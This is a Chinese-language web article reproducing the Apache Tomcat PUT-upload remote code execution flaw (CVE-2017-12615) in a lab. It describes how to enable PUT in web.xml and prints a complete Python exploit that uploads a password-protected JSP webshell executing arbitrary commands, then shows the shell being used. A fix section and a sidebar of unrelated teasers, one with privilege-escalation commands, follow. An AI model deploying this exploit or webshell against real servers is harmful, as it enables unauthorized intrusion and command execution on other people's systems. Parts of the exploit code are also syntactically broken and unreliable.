您当前的位置:首页 > 电脑百科 > 站长技术 > 服务器

Tomcat-远程代码执行漏洞

时间:2020-04-30 10:59:04  来源:  作者:

漏洞原理

Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行

漏洞环境

漏洞靶机 Win 2003x64 :192.168.136.136
PC主机(Python环境) :192.168.1.103
漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
Tomcat-远程代码执行漏洞

 

环境搭建

win 2003x64 安装 JAVA环境

Tomcat7.0.75下载:http://archive.Apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
Tomcat-远程代码执行漏洞

 


Tomcat-远程代码执行漏洞

 

开启HTTP PUT

找到Tomcat的安装目录下的conf的web.xml

Tomcat-远程代码执行漏洞

 


Tomcat-远程代码执行漏洞

 

readonly            Is this context "read only", so HTTP
					commands like PUT and DELETE are
					 rejected?  [true]   

这个意思就是说:当前是只读模式,是不允许修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

Tomcat-远程代码执行漏洞

 

添加如下代码并保存:

<init-param>
	<param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>
Tomcat-远程代码执行漏洞

 

修改完之后,重启Tomcat:

Tomcat-远程代码执行漏洞

 

漏洞复现

Python EXP:

#! -*- coding:utf-8 -*-
 
import httplib
 
import sys
 
import time
 
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.Append(temp
 
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>'''
 
try:
 
    conn = httplib.HTTPConnection(sys.argv[1])
 
    conn.request(method='OPTIONS', url='/ffffzz')
 
    headers = dict(conn.getresponse().getheaders())
 
    if 'allow' in headers and 
       headers['allow'].find('PUT') > 0 :
 
        conn.close()
 
        conn = httplib.HTTPConnection(sys.argv[1])
 
        url = "/" + str(int(time.time()))+'.jsp/'
 
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
 
        conn.request( method='PUT', url= url, body=body)
 
        res = conn.getresponse()
 
        if res.status  == 201 :
 
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
 
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
 
        elif res.status == 204 :
 
            print 'file exists'
 
        else:
 
            print 'error'
 
        conn.close()
 
    else:
 
        print 'Server not vulnerable'
 
except Exception,e:
 
    print 'Error:', e

运行Python-EXP脚本:

python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080

得到的shell:http://192.168.136.136:8080/1574766773.jsp
Tomcat-远程代码执行漏洞

 

得到一枚Webshell:

Tomcat-远程代码执行漏洞

 

访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
Tomcat-远程代码执行漏洞

 

漏洞修复

将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。



Tags:Tomcat 漏洞   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
漏洞原理Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可...【详细内容】
2020-04-30  Tags: Tomcat 漏洞  点击:(59)  评论:(0)  加入收藏
▌简易百科推荐
阿里云镜像源地址及安装网站地址https://developer.aliyun.com/mirror/centos?spm=a2c6h.13651102.0.0.3e221b111kK44P更新源之前把之前的国外的镜像先备份一下 切换到yumcd...【详细内容】
2021-12-27  干程序那些事    Tags:CentOS7镜像   点击:(1)  评论:(0)  加入收藏
前言在实现TCP长连接功能中,客户端断线重连是一个很常见的问题,当我们使用netty实现断线重连时,是否考虑过如下几个问题: 如何监听到客户端和服务端连接断开 ? 如何实现断线后重...【详细内容】
2021-12-24  程序猿阿嘴  CSDN  Tags:Netty   点击:(12)  评论:(0)  加入收藏
一. 配置yum源在目录 /etc/yum.repos.d/ 下新建文件 google-chrome.repovim /etc/yum.repos.d/google-chrome.repo按i进入编辑模式写入如下内容:[google-chrome]name=googl...【详细内容】
2021-12-23  有云转晴    Tags:chrome   点击:(7)  评论:(0)  加入收藏
一. HTTP gzip压缩,概述 request header中声明Accept-Encoding : gzip,告知服务器客户端接受gzip的数据 response body,同时加入以下header:Content-Encoding: gzip:表明bo...【详细内容】
2021-12-22  java乐园    Tags:gzip压缩   点击:(9)  评论:(0)  加入收藏
yum -y install gcc automake autoconf libtool makeadduser testpasswd testmkdir /tmp/exploitln -s /usr/bin/ping /tmp/exploit/targetexec 3< /tmp/exploit/targetls -...【详细内容】
2021-12-22  SofM    Tags:Centos7   点击:(7)  评论:(0)  加入收藏
Windows操作系统和Linux操作系统有何区别?Windows操作系统:需支付版权费用,(华为云已购买正版版权,在华为云购买云服务器的用户安装系统时无需额外付费),界面化的操作系统对用户使...【详细内容】
2021-12-21  卷毛琴姨    Tags:云服务器   点击:(6)  评论:(0)  加入收藏
参考资料:Hive3.1.2安装指南_厦大数据库实验室博客Hive学习(一) 安装 环境:CentOS 7 + Hadoop3.2 + Hive3.1 - 一个人、一座城 - 博客园1.安装hive1.1下载地址hive镜像路径 ht...【详细内容】
2021-12-20  zebra-08    Tags:Hive   点击:(9)  评论:(0)  加入收藏
以下是服务器安全加固的步骤,本文以腾讯云的CentOS7.7版本为例来介绍,如果你使用的是秘钥登录服务器1-5步骤可以跳过。1、设置复杂密码服务器设置大写、小写、特殊字符、数字...【详细内容】
2021-12-20  网安人    Tags:服务器   点击:(7)  评论:(0)  加入收藏
项目中,遇到了一个问题,就是PDF等文档不能够在线预览,预览时会报错。错误描述浏览器的console中,显示如下错误:nginx代理服务报Mixed Content: The page at ******** was loaded...【详细内容】
2021-12-17  mdong    Tags:Nginx   点击:(7)  评论:(0)  加入收藏
转自: https://kermsite.com/p/wt-ssh/由于格式问题,部分链接、表格可能会失效,若失效请访问原文密码登录 以及 通过密钥实现免密码登录Dec 15, 2021阅读时长: 6 分钟简介Windo...【详细内容】
2021-12-17  LaLiLi    Tags:SSH连接   点击:(16)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条